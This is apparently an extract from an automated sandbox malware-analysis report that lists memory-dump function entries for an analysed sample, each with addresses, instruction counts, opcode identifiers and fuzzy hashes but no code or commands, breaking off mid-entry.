                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CF038 Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bec04918935020d06732be52cdcb4332257c6bfc60df452172fce86e2e2fb21
                                                                      • Instruction ID: 45ebe78abf171cb3340c11a608218073b4241684b0e2688953f32930da816e19
                                                                      • Opcode Fuzzy Hash: 5bec04918935020d06732be52cdcb4332257c6bfc60df452172fce86e2e2fb21
                                                                      • Instruction Fuzzy Hash: 1A317C31D4DAD98FDFA9EF6898605AC7BB0FF45740F1401BAD14ADB193CE28A805C712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D0CE5 Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ae200ac867549564dfd039d39f431dac4586f0d9df3d75c47bc6f9f4cff7073
                                                                      • Instruction ID: f44c12c0541db20882360ddd11ca9da2214bc1655e7b25d289a7cf704968856f
                                                                      • Opcode Fuzzy Hash: 8ae200ac867549564dfd039d39f431dac4586f0d9df3d75c47bc6f9f4cff7073
                                                                      • Instruction Fuzzy Hash: 2B31A371E1DA8A4FEB69FF18A4522B8B7B1FF54390F54027AD00DC7282DE28B8058781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF849701E2F Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff152fc45e8332112b5871398e0f4d56bfe26ce7b2eb296fcee4b70d43c779ba
                                                                      • Instruction ID: 4d6d6601499d0d0b6069d81d3a8057f86bd9b9dc2b056825630726869bf72f90
                                                                      • Opcode Fuzzy Hash: ff152fc45e8332112b5871398e0f4d56bfe26ce7b2eb296fcee4b70d43c779ba
                                                                      • Instruction Fuzzy Hash: A2410C70D086598FEB64DF48C484BEDB7F1FF88394F2081A9C449A7295DB34A986CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D64D9 Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d3d230d2a4d684c92b6bf551e4a320ad3944628201d482d39af604d0b137bfc
                                                                      • Instruction ID: f111fdde81c40d05c4047cd75771c320796690f646c97a7a62980db684f247c0
                                                                      • Opcode Fuzzy Hash: 5d3d230d2a4d684c92b6bf551e4a320ad3944628201d482d39af604d0b137bfc
                                                                      • Instruction Fuzzy Hash: 1F31B331E1C98A8FEF69FF2894166A8B7A5FF44390F544279D01EC32C6DE28A8458781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C25 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e639881542b6dde80984ebed98ee40b42d60f72241ca0cfaa0b2c8d244de6ba2
                                                                      • Instruction ID: 563c577a1817441476cf1e643e87868dad0a6a3dd90c51d2a735987482a554bd
                                                                      • Opcode Fuzzy Hash: e639881542b6dde80984ebed98ee40b42d60f72241ca0cfaa0b2c8d244de6ba2
                                                                      • Instruction Fuzzy Hash: 0F31E435D0D5AA8EE702BB68D8112FD7760EFC1355F044576C408DA1C3DB3C28498B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CFDCE Relevance: .1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16c3d63ff51707fd419b7c9799e2bcea6505aa4834e2e649489bc03451d4bf70
                                                                      • Instruction ID: cddbdcde8610c9237fe6382931aabf35e6710db9bc8e3a5363172b7889bbb4c5
                                                                      • Opcode Fuzzy Hash: 16c3d63ff51707fd419b7c9799e2bcea6505aa4834e2e649489bc03451d4bf70
                                                                      • Instruction Fuzzy Hash: 2A315F71D0DA999FDBA8EFA888557B8BBF1FF59740F14006DC00DE7282CA3818858B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CDB77 Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 120016de93c0edfaee59129933df235ee3ff3b00aa6530bed5d1c83159b95bf3
                                                                      • Instruction ID: b79f7fb72a30b625d95f86ab6e3ac436eb026594228df483a9fd29330d125e08
                                                                      • Opcode Fuzzy Hash: 120016de93c0edfaee59129933df235ee3ff3b00aa6530bed5d1c83159b95bf3
                                                                      • Instruction Fuzzy Hash: DC417674A5892C9FDFA8EF18C899BA9B7B1FB69301F5041E9D00ED7261DA319D81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CA56F Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 441c9e0fc63c3ecff50f1c41c5568a0f82c8e85f0d1fd1d49a0bdd295159c08f
                                                                      • Instruction ID: 66535a13176ae7173c98df5b7f4b821773fe58f4594094e13b70cbf5c2b9d384
                                                                      • Opcode Fuzzy Hash: 441c9e0fc63c3ecff50f1c41c5568a0f82c8e85f0d1fd1d49a0bdd295159c08f
                                                                      • Instruction Fuzzy Hash: 8131B471E0D98A8FEF6CFF5898526B8B7A1FF45390F144179D00EC36C2CA28B8468755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D1145 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6a0d5e6dafef363f6d815635a24a5b7d84465b6988de9610ac7a8e1babf6519
                                                                      • Instruction ID: e1a8e7b19d9b6239e74599a3daad1327f5aa89350cf50ca01cd14e46f756b0fd
                                                                      • Opcode Fuzzy Hash: d6a0d5e6dafef363f6d815635a24a5b7d84465b6988de9610ac7a8e1babf6519
                                                                      • Instruction Fuzzy Hash: 65315931A0DA8A0FE799FF6898809B137A1FF95344B2A42F6D41CCB197C92CEC05C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D0C2B Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d3571c9eef7d9e00b03ceb6af78da136423a96b7f41aa44a682ce392406f0c6
                                                                      • Instruction ID: 1448dcb6ed923f4c88ef5203a72f9fa615a4311a94152e2ece0a37b35bb0abe4
                                                                      • Opcode Fuzzy Hash: 1d3571c9eef7d9e00b03ceb6af78da136423a96b7f41aa44a682ce392406f0c6
                                                                      • Instruction Fuzzy Hash: 04314F31A1C95A9FDB58EF58D4919B8B7A1FF59390B50417AD00ED3681DF34BC12CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C1905 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65b752a6908fc92999e3d611f06699e8deea6f850292f6720f31f8167607e7d9
                                                                      • Instruction ID: 888d887f7efbfea44346590ff3ed620fbebb425cb3e6439f709ac3dc535dfd5d
                                                                      • Opcode Fuzzy Hash: 65b752a6908fc92999e3d611f06699e8deea6f850292f6720f31f8167607e7d9
                                                                      • Instruction Fuzzy Hash: 46313930D1C59ACFEBA8FF548855ABD77B1FF44380F61017AD22ED6181DB38A9408B81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D38A5 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8aa211756f6adf5c59dc532a24cb441aa26d20bc7faa19ad80282ed6a339783d
                                                                      • Instruction ID: a7a9be2cf669fea11ce6eeb9ae11c6393ebf13b936502e57b30dd6ec566cbf25
                                                                      • Opcode Fuzzy Hash: 8aa211756f6adf5c59dc532a24cb441aa26d20bc7faa19ad80282ed6a339783d
                                                                      • Instruction Fuzzy Hash: C331283091DA9E8EEFA8EF5484556BDBBB5FF44384F50027AD00ED2281DB3DA9409B41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CD115 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1d3d968b1ee1f7928fb4a2ba7219da4bf21ee876ff5344a302b3582eb84d1d2
                                                                      • Instruction ID: 5632d93169b2a6a0a351ace0415c98714dc941f7b57ffb92a06719ecca0682a0
                                                                      • Opcode Fuzzy Hash: b1d3d968b1ee1f7928fb4a2ba7219da4bf21ee876ff5344a302b3582eb84d1d2
                                                                      • Instruction Fuzzy Hash: 6B31357091C98AEFEFACEF5484556BD77B5FF84380F50017AD80ED2191DA38A940AB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D0291 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 75d88b86048be6299007198b8b7148b2c7c5868a077eb5a9227f201da1fd8c1f
                                                                      • Instruction ID: 1d3e9c0b12d383c416148d5dcb789f14d2700a284889ebcfea9c93643d8d7038
                                                                      • Opcode Fuzzy Hash: 75d88b86048be6299007198b8b7148b2c7c5868a077eb5a9227f201da1fd8c1f
                                                                      • Instruction Fuzzy Hash: F911E731F4DE9A0FDBA8EA3C6C151BA77D5EBA965171602BFE41DD3286DC189C0143C4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D6426 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9707cc801a83a1d1e0d3c54748cead7ef6760217ad72e3675f722e3315dd30b0
                                                                      • Instruction ID: 52a753fc0a4f48fee6bae4e2b0e210b3ab46ee8288e1c0473f883f028fb3095a
                                                                      • Opcode Fuzzy Hash: 9707cc801a83a1d1e0d3c54748cead7ef6760217ad72e3675f722e3315dd30b0
                                                                      • Instruction Fuzzy Hash: 47313071E0894A9FDB58EF68D461AB8B7A5FF58350B108239D01EC3682CF24BC51CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F11D88 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction ID: fa1d069eeb16ae8e99daa8a96e39d7c51c8d3aa03569c750963826219b52b20b
                                                                      • Opcode Fuzzy Hash: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction Fuzzy Hash: F341F73091816A8FEB64EB14C898AECB2F5FB58341F5042F6D40DA22D6DB786EC5CF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CA49B Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30090e7ae2831d5a41752c8ac750869ccd70603d45308b4326494ab727687ce4
                                                                      • Instruction ID: 3c7a53bb49b1782d433694d01fa24003eed709e5d804af8e5fdc1b111e5fb967
                                                                      • Opcode Fuzzy Hash: 30090e7ae2831d5a41752c8ac750869ccd70603d45308b4326494ab727687ce4
                                                                      • Instruction Fuzzy Hash: E5319C30A1C94A9FDB58EF68D4559B8F7A1FF85390B004279C01EC7682CF24BC52CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F15469 Relevance: .1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1fde706596f244da80449c69d3e2825b4df3ea84e6be4c7a2e4d0c14360b4267
                                                                      • Instruction ID: e9d70396b2bc160f242f65174abe97c2a31227d97ad0544b61178ead85f281ee
                                                                      • Opcode Fuzzy Hash: 1fde706596f244da80449c69d3e2825b4df3ea84e6be4c7a2e4d0c14360b4267
                                                                      • Instruction Fuzzy Hash: 1031A97090992E8FDBA4EF14C894BEDB3F0FB64341F4041EA900DE3691DE75AA859F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D05FD Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23fae7578f808fbdd1b60594eb9cf15ec1097e57026c55cf16345488db455746
                                                                      • Instruction ID: bf6c177ad4e6522792d53de9043b7100f948daa7f4eb9e245191aae0de579f67
                                                                      • Opcode Fuzzy Hash: 23fae7578f808fbdd1b60594eb9cf15ec1097e57026c55cf16345488db455746
                                                                      • Instruction Fuzzy Hash: 56212531A0DA898FDBA5EF3CA8195267BE0EFA934072541EFC04DC7152CA24E805C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CC000 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 111f6b2a06a2ea0c77818189248a275deabad445f143ebbae7e5c23055897b66
                                                                      • Instruction ID: d83cb0c2b7ec41405d12e17e3a2b9caad90b847c35f73105f00d3abc27beb008
                                                                      • Opcode Fuzzy Hash: 111f6b2a06a2ea0c77818189248a275deabad445f143ebbae7e5c23055897b66
                                                                      • Instruction Fuzzy Hash: 7931C52095C5F68FEB3D9A1884609B47B51FF92341B288EBED09ACB4C7C82DF885C341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF849702341 Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59cf9369336b68454b7cefce60cae56875c32d65b568e4e5114fdbadaf75bd7d
                                                                      • Instruction ID: fbf0d18dc0ba5b9a0a6fb75df64c2af285c5b7c51a54ec088799b847ed94d2bd
                                                                      • Opcode Fuzzy Hash: 59cf9369336b68454b7cefce60cae56875c32d65b568e4e5114fdbadaf75bd7d
                                                                      • Instruction Fuzzy Hash: 343177A240E7C54FD7038F749CB12917FB0AF23204B0E80DBD0C8CB5A3D269A95AD762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D2790 Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d4f73401167b38e79457febf25afd75deb817f2f08faad4142c96c9d16005f0
                                                                      • Instruction ID: 04be5de1405242b3c8ee98e0664eff360d8d573ec74813a0a5f4af326539bf98
                                                                      • Opcode Fuzzy Hash: 5d4f73401167b38e79457febf25afd75deb817f2f08faad4142c96c9d16005f0
                                                                      • Instruction Fuzzy Hash: 3831471191E5D28FFB3A9B1C48606B47FA5FF52340B2847BAD08A8B0DBC91CE981C381
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C07F0 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 234c0abb0906a31b7f279620c30255ef952f8c76f2ae6aef51bbf170d347b7fc
                                                                      • Instruction ID: 75b110b9038bdef55d9d856365269977cec3e7ece15e5841682ada2d4b2f1790
                                                                      • Opcode Fuzzy Hash: 234c0abb0906a31b7f279620c30255ef952f8c76f2ae6aef51bbf170d347b7fc
                                                                      • Instruction Fuzzy Hash: 7D31291091E6D74EEB39AA248C745747B51EF51300B2987B9D4ABAB0C7D51CAC82C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C9432 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1c810ac6a73efbabab1d9cbfb1c6ce4c32c2cfdbd22cc8f15c5c329443047a6
                                                                      • Instruction ID: d9f69f87588cfad5e7000fe5e1b62dc8957532a48d5bcb7ef34fb64d7736c711
                                                                      • Opcode Fuzzy Hash: b1c810ac6a73efbabab1d9cbfb1c6ce4c32c2cfdbd22cc8f15c5c329443047a6
                                                                      • Instruction Fuzzy Hash: B421C271E1891D9FDF9DEF58C4A5AADB7B1FF68300F0041AAD01EE3691CA35A981CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D1181 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2259791a21385833cc873f0b0bb56adcf444d2294fa7ee62f4730928a7d13e4
                                                                      • Instruction ID: 07ad7b261f3cf29f6878777777a07bb3480d2a09bdabdea59fb93d9089558c6b
                                                                      • Opcode Fuzzy Hash: b2259791a21385833cc873f0b0bb56adcf444d2294fa7ee62f4730928a7d13e4
                                                                      • Instruction Fuzzy Hash: B0210831A0DA4A4FE798FF68D8C097137A1FF95344B2682B6D41DCB19BDA39E841C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D0F40 Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5521c98ed276e768c086a0b43574c318ccb3e746e918977e3a2a1925f95c420f
                                                                      • Instruction ID: 900e780aa2473a501cb1380708f1771dcc0ca1361eefa4672bdde839193baa44
                                                                      • Opcode Fuzzy Hash: 5521c98ed276e768c086a0b43574c318ccb3e746e918977e3a2a1925f95c420f
                                                                      • Instruction Fuzzy Hash: 1621955191E6C24FEB676A7428640786FB48F53294B2906FBD0CDCB4D3E90CA85AC352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C21A7 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a73569b475943844f825ce7b8812a6f59c8d4417f1c988918b9a3eba9c30d1b4
                                                                      • Instruction ID: 667bdc9a8e0356463c0483c0fc9483c91e8c80bb8d1cabe77dcf13f38d36bc8b
                                                                      • Opcode Fuzzy Hash: a73569b475943844f825ce7b8812a6f59c8d4417f1c988918b9a3eba9c30d1b4
                                                                      • Instruction Fuzzy Hash: 00217470A0995D8FDF94EF18C899BA8B7B1FB68300F1441EA910DE32A1CA35A9C5CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C0820 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
